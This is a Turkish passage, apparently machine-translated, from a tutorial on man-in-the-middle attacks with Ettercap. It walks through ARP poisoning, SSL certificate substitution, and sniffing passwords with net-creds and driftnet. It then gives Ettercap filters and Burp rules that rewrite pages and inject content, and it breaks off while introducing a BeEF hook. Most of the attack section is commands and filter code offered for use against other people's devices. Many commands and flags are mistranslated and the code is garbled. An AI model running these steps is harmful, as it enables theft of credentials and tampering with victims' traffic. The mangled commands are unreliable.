Örnekler

mevcut tüm eklentilerin listesi

Ssl Mitm Saldırısı

Sertifika dosyasını yeniden oluşturmak için:

openssl genrsa -out eter.ssl.crt 1024
openssl req -new -key eter.ssl.crt -out tmp.csr
openssl x509 -req -gün 1825 -in tmp.csr -signkey eter.ssl.crt -out tmp.new
cat tmp.new >> eter.ssl.crt
rm -f tmp.yeni tmp.csr

0) ağa bağlanın :)
1.1) cd /tmp
1) #ettercap -G [ --wep-key 128:p:gizli]
2) Sniff -> Birleşik koklama (NIC ath0)
3) Başlat->Koklamaya başla
4) Ana Bilgisayarlar -> Ana bilgisayarları tara
5) Ana Bilgisayarlar -> Ana Bilgisayar listesi
6) target1 ve target2'yi seçin ve ekleyin
7) Mitm -> arp zehirlenmesi; sniff uzak bağlantı
8) Günlüğe Kaydetme -> Tüm paketleri ve bilgileri günlüğe kaydet
9) Mitm -> Mitm saldırısını durdur
10) Başlat -> Koklamayı durdur

ettercap, gerçek ssl sertifikasını kendi sertifikasıyla değiştirir

Ettercap Alternatifleri

Ettercap en popüler ortadaki adam saldırı programıdır, ancak en iyisi mi? Talimatlar boyunca, Ettercap'ın neredeyse hiçbir zaman tek başına kullanılmadığını, bir veya başka bir programın her zaman bir trafik işleme zincirinde onunla aynı hizada olduğunu göreceksiniz. Belki de bu esneklik katar, genel olarak, bu yaklaşım UNIX'in kalbinde yer alır - bir program bir görevi gerçekleştirir ve son kullanıcı istenen sonucu elde etmek için çeşitli programları birleştirir. Bu yaklaşımla, program kodunun bakımı daha kolaydır; bu tür minyatür "tuğlalar", herhangi bir karmaşıklık ve esneklikte bir sistem oluşturmak için kullanılabilir. Ancak, beş var açık konsollar programların çalışması tek bir sonuca ulaşmayı amaçlayan farklı görevlerle - bu çok uygun değil, sadece daha zor, bir aşamada hata yapma olasılığı var ve yapılandırılmış tüm sistem hiçbir şey için çalışacak .

Net-Creds kokluyor:

• ziyaret edilen URL'ler
• gönderilen POST istekleri
• HTTP formlarından girişler/şifreler
• temel HTTP kimlik doğrulaması için oturum açma/şifreler
• HTTP aramaları
• FTP oturum açma bilgileri/şifreleri
• IRC oturum açma bilgileri/şifreleri
• POP oturum açma bilgileri/şifreleri
• IMAP oturum açma bilgileri/şifreleri
• Telnet oturum açma bilgileri/şifreleri
• SMTP oturum açma bilgileri/şifreleri
• SNMP topluluk dizesi
• HTTP, SMB, LDAP vb. gibi tüm desteklenen NTLMv1/v2 protokolleri.
• Kerberos

Yakalanan görüntülerin iyi bir seçimi ve driftnet bu konuda daha basittir - yalnızca yakalanan görüntüleri gösterir.

Makinenizi yönlendirme moduna geçirin.

echo "1" > /proc/sys/net/ipv4/ip_forward

Ettercap'ı grafiksel bir arayüzle başlatıyoruz ( -G):

Ettercap-G

şimdi seç ev sahibi, bir alt paragrafı var Ana bilgisayarları tarayın. Tarama tamamlandıktan sonra, öğesini seçin. ana bilgisayar listesi:

Gibi Hedefler1 yönlendirici seç ( Hedef 1'e Ekle), gibi Hedefler2 saldırmak istediğiniz cihazı seçin ( Hedef 2'ye Ekle).

Ancak burada, özellikle çok sayıda ana bilgisayar varsa, ilk aksaklık ortaya çıkabilir. Yukarıda sunulan video da dahil olmak üzere çeşitli talimatlarda, yazarlar hedef makineye tırmanıyor (nedense herkesin orada Windows var) ve komutu kullanarak bu makinenin IP'sine yerel ağ. Katılıyorum, bu seçenek gerçek koşullar için kabul edilemez.

İle tararsanız, ana bilgisayarlar hakkında, daha doğrusu ağ kartının üreticisi hakkında bazı ek bilgiler alabilirsiniz:

nmap -sn 192.168.1.0/24

Veriler hala yeterli değilse, işletim sisteminin tanımıyla bir tarama yapabilirsiniz:

nmap -O 192.168.1.0/24

Gördüğünüz gibi, IP 192.168.1.33 olan makinenin Windows olduğu ortaya çıktı, eğer bu yukarıdan bir işaret değilse, o zaman nedir? 😉 lol

İkinci hedef olarak eklediğimiz şey bu.

Şimdi menü maddesine geçelim. mitm. orada seçin ARP zehirlenmesi… Kutuyu kontrol et Uzak bağlantıları kokla.

Hasata başlıyoruz, başlattığımız bir pencerede

net kredi

diğerinde (her iki program da seçeneksiz çalıştırılabilir)

sürüklenme ağı

Veri toplama hemen başladı.

Sağ tarafta driftnet, yakalanan görüntüleri gösteren başka bir pencere açtı. Net-creds penceresinde, ziyaret edilen siteleri ve ele geçirilen şifreleri görüyoruz:

1.2 Ettercap + Burp Süiti

3. Ettercap'ta verileri (ziyaret edilen web siteleri ve yakalanan şifreler) görüntüleyin

Menüde görüş sekmelerimiz mevcut Bağlantılar ve profiller. Ayrıca kutuyu işaretleyebilirsiniz IP adreslerini çözümle(IP adreslerini çevirin). Bağlantılar elbette bağlantılardır. Ettercap, keşfettiği her ana bilgisayar için bellek içi profiller toplar. Kullanıcılar ve şifreler orada toplanır. Bu durumda, hesap verilerinin (şifrelerin) alındığı profiller bir çarpı işaretiyle işaretlenir:

Profillere çok fazla güvenmeyin - örneğin, FTP ve diğer hizmetler için ele geçirilen oturum açma bilgileri ve şifreler işaretlenir, bunlar için program alınan bilgileri kesin olarak kimlik bilgileri olarak yorumlayabilir. Bu, örneğin temel kimlik doğrulama verilerini, web formlarında girilen oturum açma bilgilerini ve parolaları içermez.

Bağlantılarda, en umut verici veriler bir yıldızla işaretlenmiştir:

Ayrıntıları görüntülemek için bu girişlere çift tıklayabilirsiniz:

Tüm listede bu yıldızları aramamak için bu alana göre sıralayabilirsiniz ve hepsi en üstte veya en altta olacaktır:

Temel kimlik doğrulaması yakalandı:

Yandex için giriş şifresi (aşağıda vurgulanmıştır):

Vkontakte için ele geçirilen kimlik bilgileri şunlardır:

Ayrıca, en ilginç veriler alt konsolda toplanır:

Programın sonuçlarını kaydetmek istiyorsanız, bu seçenekleri kullanın (Ettercap'ı başlatırken tuşları belirtin:

Günlüğe kaydetme seçenekleri: -w, --write<файл>yakalanan verileri pcapfile'a yaz<файл>-L, --log<логфайл>tüm trafiği buna yaz<логфайл>-l, --log bilgisi<логфайл>buna sadece pasif bilgi yaz<логфайл>-m, --log-msg<логфайл>tüm mesajları buna yaz<логфайл>-c, --compress günlük dosyaları için gzip sıkıştırmasını kullanır

4. Ettercap'ta anında veri değişimi

4.1 Özel Ettercap Filtrelerini Kullanma

Not: Tüm testlerimde Ettercap filtreleri çalışmadı. Ellerde mi, donanım özelliklerinde mi yoksa programın kendisinde mi bir bug'da olduğunu anlamak zor... Ama 0.8.2 sürümü için (şu an en son) filtrelerle ilgili sorunlarla ilgili bir hata raporu var. Genel olarak, hata raporlarına ve forumlara bakılırsa, filtreler ya sık sık düşüyor ya da uzun süre hiç çalışmıyor. 5 ay önce değiştirilmiş bir şube var https://github.com/Ettercap/ettercap/tree/filter-improvements, yani. filtre iyileştirmeleri (filtre iyileştirmeleri ile). Bu dal için çok çeşitli testler yapıldı ve depodan gelen sürüm için çeşitli filtreler farklı koşullarda test edildi, çok zaman harcandı, ancak sonuç alınamadı. Bu arada, filtre geliştirmelerinin sürümünü Kali Linux'a yüklemek için şunu yapmanız gerekir:

sudo apt-get kaldır ettercap-grafik ettercap-ortak sudo apt-get kurulumu git debhelper bison kontrol cmake flex Ghostscript libbsd-dev libcurl4-openssl-dev libgtk2.0-dev libltdl-dev libluajit-5.1-dev libncurses5-dev libpcap-dev libpcre3-dev libssl-dev libgtk-3-dev Ghostscript groff libtool libpcre3 libncurses5-dev git klonu -b filtre iyileştirmeleri https://github.com/Ettercap/ettercap.git cd ettercap/ mkdir build cd build cd fmake EN =Açık ../ sudo make install yap

Genel olarak, filtreleriniz çalışmıyorsa, yalnız değilsiniz. Ettercap talimatlarında filtre konusunu atlayamıyorum, bu yüzden yine de dikkate alınacaklar.

Şimdiye kadar ARP sahtekarlığı için Ettercap kullanıyoruz. Bu çok yüzeysel bir uygulamadır. Özel filtreler sayesinde anında müdahale edebiliyor ve trafiğe müdahale edebiliyoruz. Filtreler içinde olmalıdır ayrı dosyalar kullanılmadan önce Etterfilter programı ile derlenmelidir. Bağlantının verildiği belgeler kısa gibi görünse de, aşağıdaki örneklerle birleştiğinde, oldukça ilginç filtreler yazmanıza izin verecektir.

İlk filtremizi oluşturalım, tüm resimleri bununla değiştirecek:

img_replacer.filter adlı bir dosyada kopyalayın:

If (ip.proto == TCP && tcp.dst == 80) ( if (search(DATA.data, "Kabul-Kodlama")) ( replace("Kabul-Kodlama", "Kabul-Çöp!"); # not: değiştirme dizesi orijinal msg("zapped Accept-Encoding!\n"); ) ile aynı uzunluktadır ) if (ip.proto == TCP && tcp.src == 80) ( replace("src=" , " src=\"http://www.irongeek.com/images/jollypwn.png\" "); replace("SRC=", "src=\"http://www.irongeek.com/images/ jollypwn. png\" "); replace("src =", "src=\"http://www.irongeek.com/images/jollypwn.png\" "); replace("SRC=", "src= \" http://www.irongeek.com/images/jollypwn.png\" "); msg("Filter Ran.\n"); )

Dosyayı derleyin:

Etterfilter img_replacer.filter -o img_replacer.ef

Derleme sonuçları:

Etterfilter 0.8.2 telif hakkı 2001-2015 Ettercap Geliştirme Ekibi 14 protokol tablosu yüklendi: DECODED DATA udp tcp esp gre icmp ipv6 ip arp wifi fddi tr eth yüklenen 13 sabit: VRRP OSPF GRE UDP TCP ESP ICMP6 ICMP PPTP PPPOE IP6 IP ARP Kaynak dosya ayrıştırılıyor "img_replacer.filter" tamamlandı. Meta ağacının açılması tamamlandı. Etiketlerin gerçek ofsetlere dönüştürülmesi tamamlandı. "img_replacer.ef" dosyasına çıktı yazıldı. -> Komut dosyası 18 talimata kodlanmıştır.

Anahtar -F programa, anahtarı takip eden dosyadan filtreyi yüklemesini söyler. Derlemeden sonra, filtreli yeni dosyamızın adı img_replacer.ef olur, bu nedenle komut şöyle olur:

Ettercap -G -F img_replacer.ef

Not C: Web trafiğini izlediğinizde, gördüğünüz paketler kodlanmış biçimde olabilir. Filtrelerin etkili bir şekilde çalışması için Ettercap düz metin trafiğine ihtiyaç duyar. Bazı gözlemlere göre, web sayfalarının kullandığı kodlama türü "Kabul Et-Kodlama: gzip, deflate" şeklindedir.

Aşağıda, kodlamanın üzerine yazan ve iletişimi düz metin biçiminde zorlayan bir filtre bulunmaktadır:

if (ip.proto == TCP && tcp.dst == 80) ( if (arama(DATA.data, "gzip")) ( replace("gzip", " "); # not: mesaj dizesinde dört boşluk replace ("whited out gzip\n"); ) ) if (ip.proto == TCP && tcp.dst == 80) ( if (search(DATA.data, "deflate")) ( replace("deflate", " "); # not: değiştirme dizesinde yedi boşluk msg("whited out deflate\n"); ) )

Filtre yazma sözdizimi ayrıntılı olarak açıklanmış ve ardından birkaç örnek daha verilmiştir:

# paketteki metni değiştir: if (ip.proto == TCP && search(DATA.data, "lol"))( replace("lol", "smh"); msg("filter ran"); ) # mesajı göster tcp bağlantı noktası 22 ise if (ip.proto == TCP) ( if (tcp.src == 22 || tcp.dst == 22) ( msg("SSH paketi\n"); ) ) # tüm telnet trafiğini günlüğe kaydet , ayrıca if (ip.proto == TCP) ( if (tcp.src == 23 || tcp.dst == 23) ( log(DATA.data, "./logfile.log ") başına ./programı yürütün ; exec("./program"); ​​​)) # http if (ip.proto == TCP && tcp.src != 80 && tcp.dst != 80) ( log(DATA.data , "./logfile.log"); ) # if (DATA.data + 20 == 0x4142) ( DATA.data + 20 = 0x4243; ) else ( DATA.data = "modified"; DATA .data + bazı paket yük işlemleri 20 = 0x4445; ) # "ettercap" içeren tüm paketleri bırak if (search(DECODED.data, "ettercap")) ( msg("birisi bizden bahsediyor...\n"); drop( ); kill( ); ) # if (ip.proto == TCP) ( if (tcp.src == 22 || tcp.dst == 22) ( if (regex(DECODED.data, ".*login.*")) ( log(DECODED.data, "./decrypted_log"); ) ) ) # if (ip.ttl) paketleri öldürme< 5) { msg("The packet will die soon\n"); } # то же самое для IPv6, но делая тривиальный тест убеждаемся, что перед нами действительно IPv6 пакеты if (eth.proto == IP6 && ipv6.hl < 5) { msg("The IPv6 packet will die soon\n"); } # сравнение строки на данный сдвиг if (DATA.data + 40 == "ette") { log(DATA.data, "./logfile"); } # вставить файл после указанного пакета if (tcp.src == 21 && search(DATA.data, "root")) { inject("./fake_response"); } # целиком заменить пакет на другой if (tcp.src == 23 && search(DATA.data, "microsoft")) { drop(); inject("./fake_telnet"); } # Изменение бинарных данных используя внешнюю программу if (udp.dst == 53 && pcre_regex(DATA.data, ".*\x03com\x00.*")) { log(DATA.data, "/tmp/payload"); drop(); execinject("/bin/sed "s/\x03com\x00/\x02my\x04page\x02de\x00/g" /tmp/payload"); udp.len += 7; exec("/bin/rm /tmp/payload"); msg("faked"); } # фильтровать только указанный IP адрес if (ip.src == "192.168.0.2") { drop(); } # делать то же самое для IPv6 if (ipv6.src == "2001:db8::1") { drop(); } # комбинируем IPv4 и IPv6 if (eth.proto == IP && ip.dst == "192.168.0.2") { msg("drop IPv4"); drop(); } if (eth.proto == IP6 && ipv6.dst == "2001:db8::1") { msg("drop IPv6"); drop(); } # транслировать tcp пакеты с порта 80 на 81 if (tcp.dst == 80) { tcp.dst -= 1; tcp.dst += 2; } # найти и покалечить пакеты ESP if (ip.proto == ESP) { DATA.data = "DEADDECAF"; }

4.2 Burp ile veri sahtekarlığı

Ettercap ve Burp'u paragraf 1.2'de veya paragraf 2.2'de açıklandığı gibi başlatıyoruz.

Burp'ta git Proxy -> Seçenekler. orada buluruz Eşleştir ve Değiştir. Tıklamak Ekle Yeni bir kural eklemek için

• Başlık iste istek başlığıdır
• istek gövdesi- istek gövdesi
• yanıt başlığı- yanıt başlığı
• yanıt organı- yanıt gövdesi
• Param adı iste- Sorgu parametresi adı
• Param değeri iste- Parametre değeri iste
• İlk satırı iste- Sorgunun ilk satırı

GET yöntemiyle iletilen verileri değiştirmeniz gerekiyorsa, bu, başlıklar için geçerlidir.

HTML işaretlemesinde ayrıca head (head etiketi) diye bir şey vardır. Yukarıda bahsedilenlerin bu başlıkla hiçbir ilgisi yoktur. Biraz daha yüksek paket başlıkları hakkında söylenir. İçeriği değiştirmek istiyorsanız HTML sayfaları, o zaman head etiketinin içeriğini (örneğin, başlık) değiştirecek olsanız bile, İstek başlığı yerine her zaman Yanıt gövdesini seçmelisiniz.

Normal ifadelere aşina değilseniz, o zaman, prensipte, sorun değil: HTML birçok şeyi affeder ve anlamadığı şeyi görmezden gelir - kullanabilirsiniz. Normal ifadelerin nasıl kullanılacağını biliyorsanız, size saygı duyuyorum.)))

Örneğin yeni bir kural oluşturalım, İstek başlığını Yanıt gövdesi olarak değiştirelim. Kuralın kendisinde, değiştireceğiz

Kutuyu kontrol et normal ifade eşleşmesi.

Artık tüm sitelerde (HTTPS'siz) başlık yerine Başlık Yok olacak:

Gövde etiketinden sonra isteğe bağlı bir satır ekleyin (metindeki ilk satır olacaktır). İstek başlığı, Yanıt gövdesi olarak değiştirilir. Biz değiştiririz

Kutuyu kontrol et normal ifade eşleşmesi.

Sağ üst köşede (düzene bağlı olarak) "Ben havalıyım!" Yazısı görünür. CSS, JavaScript kodu, herhangi bir metin - herhangi bir şey ekleyebilirsiniz. Genellikle sayfadan her şeyi silebilir ve ardından kendi içeriğinizle doldurabilirsiniz - hepsi hayal gücünüze bağlıdır.

Verilerin orijinal sunucuya ve saldırganın sunucusuna gönderilmesi için her formu biraz değiştirme fikri vardı (her form için çoklu gönderim uygulayın). Ancak, iletilen veriler şifrelenmemişse ve buna erişimimiz varsa, yine de onu görürsek, herhangi bir sunucuya göndermemize gerek olmadığını düşündükten sonra. Yine de, birinin buna ihtiyacı varsa, aynı anda bir formdan birkaç sunucuya veri göndermenin gerçekten çalışan bir örneği.

5. BeEF bağlantısı

BeEF özelliklerini kullanmaya başlamak için kodu HTML'ye enjekte etmemiz gerekiyor. JavaScript dosyası, genellikle şöyle bir dize: